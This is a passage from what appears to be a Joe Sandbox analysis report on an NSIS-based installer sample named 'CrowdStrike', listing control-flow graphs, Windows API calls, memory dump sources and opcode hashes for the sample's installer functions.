                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: CountFileTickWrite$wsprintf
                                                                        • String ID: ... %d%%$P1B$X1C$X1C
                                                                        • API String ID: 651206458-1535804072
                                                                        • Opcode ID: 71a0af70068d15f1e2712f5ef5f0e4f02d53f291cdcd50b6d0822de58acd1dbf
                                                                        • Instruction ID: 0313947f0097750978ec936bbe46de4fad37e772bc1cb17ec77dd8e30cfa9ece
                                                                        • Opcode Fuzzy Hash: 71a0af70068d15f1e2712f5ef5f0e4f02d53f291cdcd50b6d0822de58acd1dbf
                                                                        • Instruction Fuzzy Hash: 88518D71900219ABDF10DF65AE44AAF7BACAB00316F14417BF900B7290DB78DF40CBA9

                                                                        Control-flow Graph

                                                                        [Control-flow graph image (executed / not-executed blocks) for the function at 00401EB9, basic blocks 00401EB9-00402E50 with a shared exit block at 004030E3-004030F2. Imports called from the graph: GlobalAlloc, GlobalFree. Internal subcalls: 004062A3, 00406805, 00406009.]
                                                                        APIs
                                                                          • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                        • GlobalFree.KERNELBASE(00753688), ref: 00402387
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: FreeGloballstrcpyn
                                                                        • String ID: Exch: stack < %d elements$MostIsrael$Pop: stack empty
                                                                        • API String ID: 1459762280-4003919556
                                                                        • Opcode ID: 4c8c09c83ece9067cd01ebc7f99896dd0048823aea7dafec600988da42eaf391
                                                                        • Instruction ID: ae7cb1f2c63b60d7baa415153617f8c61fd22799b34192a347ea6a0a5f6d971a
                                                                        • Opcode Fuzzy Hash: 4c8c09c83ece9067cd01ebc7f99896dd0048823aea7dafec600988da42eaf391
                                                                        • Instruction Fuzzy Hash: 4721D172601105EBE710EB95DD81A6F77A8EF44318B21003FF542F32D1EB7998118AAD

                                                                        Control-flow Graph

                                                                        [Control-flow graph image (executed / not-executed blocks) for the function at 004022FD, basic blocks 004022FD-0040238D with a shared exit block at 004030E3-004030F2. Imports called from the graph: GetFileVersionInfoSizeW, GlobalAlloc, GetFileVersionInfoW, VerQueryValueW, GlobalFree. Internal subcalls: 0040145C, 00405F51 (twice).]
                                                                        APIs
                                                                        • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                        • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                        • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                        • VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360
                                                                          • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                        • GlobalFree.KERNELBASE(00753688), ref: 00402387
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                        • String ID:
                                                                        • API String ID: 3376005127-0

                                                                        Control-flow Graph

                                                                        control_flow_graph 608 402b23-402b37 GlobalAlloc 609 402b39-402b49 call 401446 608->609 610 402b4b-402b6a call 40145c WideCharToMultiByte lstrlenA 608->610 615 402b70-402b73 609->615 610->615 616 402b93 615->616 617 402b75-402b8d call 405f6a WriteFile 615->617 618 4030e3-4030f2 616->618 617->616 622 402384-40238d GlobalFree 617->622 622->618
                                                                        APIs
                                                                        • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                        • WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                        • lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                        • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                        Similarity
                                                                        • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                        • String ID:
                                                                        • API String ID: 2568930968-0

                                                                        Control-flow Graph

                                                                        control_flow_graph 711 4021b5-40220b call 40145c * 4 call 404f72 ShellExecuteW 722 402223-4030f2 call 4062a3 711->722 723 40220d-40221b call 4062a3 711->723 723->722
                                                                        APIs
                                                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                          • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB), ref: 00404FCD
                                                                          • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                        • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202
                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                        Strings
                                                                        • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                        • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                        Similarity
                                                                        • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                        • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                        • API String ID: 3156913733-2180253247

                                                                        Control-flow Graph

                                                                        control_flow_graph 731 405e7f-405e8b 732 405e8c-405ec0 GetTickCount GetTempFileNameW 731->732 733 405ec2-405ec4 732->733 734 405ecf-405ed1 732->734 733->732 736 405ec6 733->736 735 405ec9-405ecc 734->735 736->735
                                                                        APIs
                                                                        • GetTickCount.KERNEL32 ref: 00405E9D
                                                                        • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8
                                                                        Similarity
                                                                        • API ID: CountFileNameTempTick
                                                                        • String ID: nsa
                                                                        • API String ID: 1716503409-2209301699

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 737 4078c5-4078cb 738 4078d0-4078eb 737->738 739 4078cd-4078cf 737->739 740 407aeb-407aff 738->740 741 407bad-407bba 738->741 739->738 743 407b01-407b17 740->743 744 407b19-407b2c 740->744 742 407be7-407beb 741->742 745 407c4a-407c5d 742->745 746 407bed-407c0c 742->746 747 407b33-407b3a 743->747 744->747 750 407c65-407c68 745->750 751 407c25-407c39 746->751 752 407c0e-407c23 746->752 748 407b61-407b64 747->748 749 407b3c-407b40 747->749 748->750 753 407b46-407b5e 749->753 754 407ccd-407cd4 749->754 758 407350 750->758 759 407cec 750->759 755 407c3c-407c43 751->755 752->755 753->748 757 407cdd-407cea 754->757 760 407be1-407be4 755->760 761 407c45 755->761 762 407cef-407cf6 757->762 763 407357-40735b 758->763 764 40749b-4074b6 758->764 765 40746d-407471 758->765 766 4073ff-407403 758->766 759->762 760->742 768 407cd6 761->768 769 407bc6-407bde 761->769 763->757 771 407361-40736e 763->771 764->740 772 407c76-407c7d 765->772 773 407477-40748b 765->773 774 407409-407420 766->774 775 407c6d-407c74 766->775 768->757 769->760 771->759 776 407374-4073ba 771->776 772->757 777 40748e-407496 773->777 778 407423-407427 774->778 775->757 780 4073e2-4073e4 776->780 781 4073bc-4073c0 776->781 777->765 782 407498 777->782 778->766 779 407429-40742f 778->779 783 407431-407438 779->783 784 407459-40746b 779->784 787 4073f5-4073fd 780->787 788 4073e6-4073f3 780->788 785 4073c2-4073c5 GlobalFree 781->785 786 4073cb-4073d9 GlobalAlloc 781->786 782->764 789 407443-407453 GlobalAlloc 783->789 790 40743a-40743d GlobalFree 783->790 784->777 785->786 786->759 791 4073df 786->791 787->778 788->787 788->788 789->759 789->784 790->789 791->780
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                                        • Instruction ID: 5b61ba0e549d4a34e11b5feda41afe9ae6537485a044c30e59ebd23bda5797f4
                                                                        • Opcode Fuzzy Hash: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                                        • Instruction Fuzzy Hash: BCA14771908248DBEF18CF28C8946AD3BB1FB44359F14812AFC56AB280D738E985DF85

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 792 407ac3-407ac7 793 407ac9-407bba 792->793 794 407ade-407ae4 792->794 804 407be7-407beb 793->804 796 407aeb-407aff 794->796 797 407b01-407b17 796->797 798 407b19-407b2c 796->798 801 407b33-407b3a 797->801 798->801 802 407b61-407b64 801->802 803 407b3c-407b40 801->803 807 407c65-407c68 802->807 805 407b46-407b5e 803->805 806 407ccd-407cd4 803->806 808 407c4a-407c5d 804->808 809 407bed-407c0c 804->809 805->802 810 407cdd-407cea 806->810 816 407350 807->816 817 407cec 807->817 808->807 812 407c25-407c39 809->812 813 407c0e-407c23 809->813 815 407cef-407cf6 810->815 814 407c3c-407c43 812->814 813->814 823 407be1-407be4 814->823 824 407c45 814->824 818 407357-40735b 816->818 819 40749b-4074b6 816->819 820 40746d-407471 816->820 821 4073ff-407403 816->821 817->815 818->810 825 407361-40736e 818->825 819->796 826 407c76-407c7d 820->826 827 407477-40748b 820->827 829 407409-407420 821->829 830 407c6d-407c74 821->830 823->804 831 407cd6 824->831 832 407bc6-407bde 824->832 825->817 833 407374-4073ba 825->833 826->810 834 40748e-407496 827->834 835 407423-407427 829->835 830->810 831->810 832->823 837 4073e2-4073e4 833->837 838 4073bc-4073c0 833->838 834->820 839 407498 834->839 835->821 836 407429-40742f 835->836 840 407431-407438 836->840 841 407459-40746b 836->841 844 4073f5-4073fd 837->844 845 4073e6-4073f3 837->845 842 4073c2-4073c5 GlobalFree 838->842 843 4073cb-4073d9 GlobalAlloc 838->843 839->819 846 407443-407453 GlobalAlloc 840->846 847 40743a-40743d GlobalFree 840->847 841->834 842->843 843->817 848 4073df 843->848 844->835 845->844 845->845 846->817 846->841 847->846 848->837
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                                        • Instruction ID: 0868455ade8710e2db62ea7c97591ecaf8a07f5330254cde648c5a00cf1b77b0
                                                                        • Opcode Fuzzy Hash: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                                        • Instruction Fuzzy Hash: 30912871908248DBEF14CF18C8947A93BB1FF44359F14812AFC5AAB291D738E985DF89

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 849 407312-407330 850 407332-407335 849->850 851 40733a-407341 849->851 852 407cf0-407cf6 850->852 853 407344-40734a 851->853 854 407350 853->854 855 407cec 853->855 856 407357-40735b 854->856 857 40749b-407aff 854->857 858 40746d-407471 854->858 859 4073ff-407403 854->859 860 407cef 855->860 861 407361-40736e 856->861 862 407cdd-407cea 856->862 870 407b01-407b17 857->870 871 407b19-407b2c 857->871 863 407c76-407c7d 858->863 864 407477-40748b 858->864 866 407409-407420 859->866 867 407c6d-407c74 859->867 860->852 861->855 868 407374-4073ba 861->868 862->860 863->862 869 40748e-407496 864->869 872 407423-407427 866->872 867->862 874 4073e2-4073e4 868->874 875 4073bc-4073c0 868->875 869->858 876 407498 869->876 877 407b33-407b3a 870->877 871->877 872->859 873 407429-40742f 872->873 880 407431-407438 873->880 881 407459-40746b 873->881 884 4073f5-4073fd 874->884 885 4073e6-4073f3 874->885 882 4073c2-4073c5 GlobalFree 875->882 883 4073cb-4073d9 GlobalAlloc 875->883 876->857 878 407b61-407c68 877->878 879 407b3c-407b40 877->879 878->853 886 407b46-407b5e 879->886 887 407ccd-407cd4 879->887 888 407443-407453 GlobalAlloc 880->888 889 40743a-40743d GlobalFree 880->889 881->869 882->883 883->855 891 4073df 883->891 884->872 885->884 885->885 886->878 887->862 888->855 888->881 889->888 891->874
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                                        • Instruction ID: 3981f1dd08afc316d24d9ed5113be2a17ca7da729ed8f25fba603efd3ef4d826
                                                                        • Opcode Fuzzy Hash: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                                        • Instruction Fuzzy Hash: 39815931908248DBEF14CF29C8446AE3BB1FF44355F10812AFC66AB291D778E985DF86
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                                        • Instruction ID: 01891581271c5a124b16634c3a8992e7a6857e255b4271240234ec945a90a24d
                                                                        • Opcode Fuzzy Hash: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                                        • Instruction Fuzzy Hash: 73713571908248DBEF18CF28C894AAD3BF1FB44355F14812AFC56AB291D738E985DF85
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                                        • Instruction ID: 94e3b44a92ae0aa4503ed5f8848dd13d39bc4d5c5e61625994f203468061122b
                                                                        • Opcode Fuzzy Hash: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                                        • Instruction Fuzzy Hash: 25713671908248DBEF18CF19C894BA93BF1FB44345F10812AFC56AA291C738E985DF86
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                                        • Instruction ID: 61f7b93237898aea062553d5d4b8719da8ac7eccb5076a10c91df3859b53dd49
                                                                        • Opcode Fuzzy Hash: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                                        • Instruction Fuzzy Hash: 98612771908248DBEF18CF19C894BAD3BF1FB44345F14812AFC56AA291C738E985DF86
                                                                        APIs
                                                                        • GlobalFree.KERNELBASE(?), ref: 004073C5
                                                                        • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
                                                                        • GlobalFree.KERNELBASE(?), ref: 0040743D
                                                                        • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: Global$AllocFree
                                                                        • String ID:
                                                                        • API String ID: 3394109436-0
                                                                        • Opcode ID: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                                        • Instruction ID: da36524f31269fd1e9de8fc6705d7123eeae9c681c0d19372ba3dadca10d6d3f
                                                                        • Opcode Fuzzy Hash: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                                        • Instruction Fuzzy Hash: 81513871918248EBEF18CF19C894AAD3BF1FF44345F10812AFC56AA291C738E985DF85
                                                                        APIs
                                                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                        • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID:
                                                                        • API String ID: 3850602802-0
                                                                        • Opcode ID: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                                        • Instruction ID: d71d45502f518029c3ce7990b7c8d381ac94a1bb539c673c2af025244294d997
                                                                        • Opcode Fuzzy Hash: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                                        • Instruction Fuzzy Hash: 96F0F471A10220DFD7555B74DD04B273699AB80361F24463BF911F62F1E6B8DC528B4E
                                                                        APIs
                                                                        • GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                        • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: File$AttributesCreate
                                                                        • String ID:
                                                                        • API String ID: 415043291-0
                                                                        • Opcode ID: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                                        • Instruction ID: fe2e31f24f36ecb58ba6038de6e4569557e5a61990f2f31681ab57118d472e11
                                                                        • Opcode Fuzzy Hash: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                                        • Instruction Fuzzy Hash: BCD09E71554202EFEF098F60DE1AF6EBBA2FB94B00F11852CB292550F0DAB25819DB15
                                                                        APIs
                                                                        • GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
                                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: AttributesFile
                                                                        • String ID:
                                                                        • API String ID: 3188754299-0
                                                                        • Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                                        • Instruction ID: a99f375bd2b1051765f890e1d94d2f722c1bb1ba0a12d38356d8610c0186b9c0
                                                                        • Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                                        • Instruction Fuzzy Hash: 84C01272404800EAC6000B34DF0881A7B62AB90330B268B39B0BAE00F0CB3488A99A18
                                                                        APIs
                                                                        • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
